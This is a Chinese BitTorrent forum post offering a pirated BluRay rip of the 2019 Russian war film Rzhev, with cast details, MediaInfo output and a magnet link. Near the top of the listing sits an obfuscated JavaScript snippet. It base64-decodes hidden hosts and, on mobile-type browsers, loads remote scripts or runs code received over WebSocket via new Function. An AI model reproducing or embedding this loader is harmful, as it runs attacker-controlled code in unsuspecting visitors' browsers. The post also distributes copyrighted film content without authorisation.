勒热夫战役[中文字幕].Rzhev.2019.1080p.BluRay.迅雷下载 9.83GB

版主小s 3月前 346

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};


勒热夫战役[中文字幕].Rzhev.2019.1080p.BluRay.迅雷下载 9.83GB

◎译  名 勒热夫战役 / 勒热夫之战 / Rzhev
◎片  名 Ржев
◎年  代 2019
◎产  地 俄罗斯
◎类  别 剧情 / 历史 / 战争
◎语  言 俄语
◎上映日期 2019-12-05(俄罗斯)
◎IMDb链接 https://www.imdb.com/title/tt11426562/
◎豆瓣评分 7.4/10 (7653人评价)
◎豆瓣链接 https://movie.douban.com/subject/34904937/
◎片  长 113分钟
◎导  演 伊戈尔·科皮洛夫 Igor Kopylov (id:1341277)
◎编  剧 维亚切斯拉夫·康德拉季耶夫 Вячеслав Кондратьев (id:1438367)
◎演  员 谢尔盖·扎尔科夫 Sergey Zharkov (id:1437959)
       伊凡·巴塔列夫 Ivan Batarev (id:1437957)
       奥列格·加亚诺夫 Oleg Gayanov (id:1437955)
       亚历山大·布哈罗夫 Aleksandr Bukharov (id:1005330)
       阿塞尼·谢梅诺夫 Arseniy Semyonov (id:1437963)
       伊戈尔·格拉布佐夫 Igor Grabuzov (id:1437967)
       格里戈利·涅克拉索夫 Grigori Nekrasov (id:1437974)
       丹·罗津 Dan Rozin (id:1437960)
       亚历山德·佩拉卡斯 Aleksandr Plaksin (id:1437962)
       亚历山大·阿拉沃什金 Aleksandr Aravushkin (id:1437969)
       亚历山大·戈尔巴托夫 Aleksandr Gorbatov (id:1437961)
       安德烈·科罗夫尼琴科 Andrey Korovnichenko (id:1437988)
       彼得·洛加切夫 Pyotr Logachev (id:1437488)
       丹尼尔·沃罗帕夫 Daniil Voropaev (id:1437989)
       奥列格·阿巴林 Oleg Abalyan (id:1437330)

◎标  签 二战 / 战争 / 俄罗斯 / 苏德战争 / 历史 / 苏联 / 2019 / 剧情

◎简  介
  第二次世界大战苏德战争中苏联红军与德国中央集团军群,在勒热夫一线争夺德军据守的“勒热夫突出部”。

  1. General
  2. Unique ID                                : 170121576522102647081378287366782577708 (0x7FFC394DA547A398B84E0A91EB1BEC2C)
  3. Complete name                            : Rzhev.2019.1080p.BluRay.DTS.x265-10bit-HDS.mkv
  4. Format                                   : Matroska
  5. Format version                           : Version 4
  6. File size                                : 9.83 GiB
  7. Duration                                 : 1 h 57 min
  8. Overall bit rate mode                    : Variable
  9. Overall bit rate                         : 12.0 Mb/s
  10. Movie name                               : Rzhev 2019 1080p BluRay DTS x265-10bit-HDS
  11. Encoded date                             : UTC 2021-06-12 16:03:46
  12. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit
  13. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2
  14. Video
  15. ID                                       : 1
  16. Format                                   : HEVC
  17. Format/Info                              : High Efficiency Video Coding
  18. Format profile                           : Main [email protected]@High
  19. Codec ID                                 : V_MPEGH/ISO/HEVC
  20. Duration                                 : 1 h 57 min
  21. Bit rate                                 : 7 941 kb/s
  22. Width                                    : 1 920 pixels
  23. Height                                   : 800 pixels
  24. Display aspect ratio                     : 2.40:1
  25. Frame rate mode                          : Constant
  26. Frame rate                               : 24.000 FPS
  27. Color space                              : YUV
  28. Chroma subsampling                       : 4:2:0
  29. Bit depth                                : 10 bits
  30. Bits/(Pixel*Frame)                       : 0.215
  31. Stream size                              : 6.50 GiB (66%)
  32. Title                                    : [email protected]
  33. Writing library                          : x265 - H.265/HEVC codec
  34. Default                                  : Yes
  35. Forced                                   : No
  36. Audio
  37. ID                                       : 2
  38. Format                                   : DTS XLL
  39. Format/Info                              : Digital Theater Systems
  40. Commercial name                          : DTS-HD Master Audio
  41. Codec ID                                 : A_DTS
  42. Duration                                 : 1 h 57 min
  43. Bit rate mode                            : Variable
  44. Bit rate                                 : 4 039 kb/s
  45. Channel(s)                               : 6 channels
  46. Channel layout                           : C L R Ls Rs LFE
  47. Sampling rate                            : 48.0 kHz
  48. Frame rate                               : 93.750 FPS (512 SPF)
  49. Bit depth                                : 24 bits
  50. Compression mode                         : Lossless
  51. Stream size                              : 3.31 GiB (34%)
  52. Title                                    : Russian
  53. Language                                 : Russian
  54. Default                                  : Yes
  55. Forced                                   : No
  56. Text
  57. ID                                       : 3
  58. Format                                   : PGS
  59. Muxing mode                              : zlib
  60. Codec ID                                 : S_HDMV/PGS
  61. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  62. Duration                                 : 1 h 51 min
  63. Bit rate                                 : 32.3 kb/s
  64. Count of elements                        : 2139
  65. Stream size                              : 25.8 MiB (0%)
  66. Title                                    : CHS
  67. Language                                 : Chinese
  68. Default                                  : Yes
  69. Forced                                   : No


TAGS 剧情 历史 战争

磁力链:
  • magnet:?xt=urn:btih:1F8648535726AFA8C67A4E6C1E97D9DB1FBC1AC0
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回